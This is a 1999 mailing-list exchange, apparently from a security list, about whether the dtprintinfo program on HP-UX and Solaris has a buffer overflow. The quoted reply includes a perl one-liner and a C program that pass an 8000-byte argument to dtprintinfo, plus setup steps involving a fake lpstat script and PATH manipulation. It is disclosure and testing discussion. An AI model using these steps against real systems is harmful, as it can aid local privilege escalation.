Re: [Solaris2.6,2.7 dtprintinfo exploits]

[Thiago.M.M.Zaninotti () UNILEVER COM (Thiago MM Zaninotti)]

Hi Paul,

I'm sorry for the wrong output I've provided and you are correct: csh will
complain about long strings. I've already checked it in another shell and it
didn't appear to be vulnerable to the problem.


Thiago Zaninotti
IMC LABG


-----Original Message-----
From:   Paul Hart [SMTP:hart () iserver com]
Sent:   Thursday, May 13, 1999 8:15 PM
To:     Thiago MM Zaninotti
Subject:        Re: [Solaris2.6,2.7 dtprintinfo exploits]

On Wed, 12 May 1999, Thiago MM Zaninotti wrote:

> dtprintinfo in HPUX does not seen to be vulnerable to the overflow problem:
>
> % /usr/dt/bin/dtprintinfo -p `perl -e "print 'A' x 8000"`
> Pathname too long.
> %

That's a message from your shell, not the dtprintinfo program; the
dtprintinfo program is never being run.  Your shell thinks that 8000
characters in an argument is too long.  You'll need to use a different
shell that can handle long arguments (I use tcsh) or make a small C
program that execs dtprintinfo with the long command argument.  This
should work:

#include <unistd.h>
#include <string.h>
#include <stdio.h>

#define LENGTH 8000

void main()
{
    char buffer[LENGTH];

    memset(buffer, 'A', LENGTH);
    buffer[LENGTH - 1] = '\0';
    execl("/usr/dt/bin/dtprintinfo", "dtprintinfo", "-p", buffer, NULL);
    printf("exec failed");
}

Also make sure (at least on Solaris) that you have a script in your
current directory named "lpstat" and that "." is the first element of your
PATH environment variable.  Here's what I have for my lpstat script:

#!/bin/sh
echo "system for lpprn: localhost"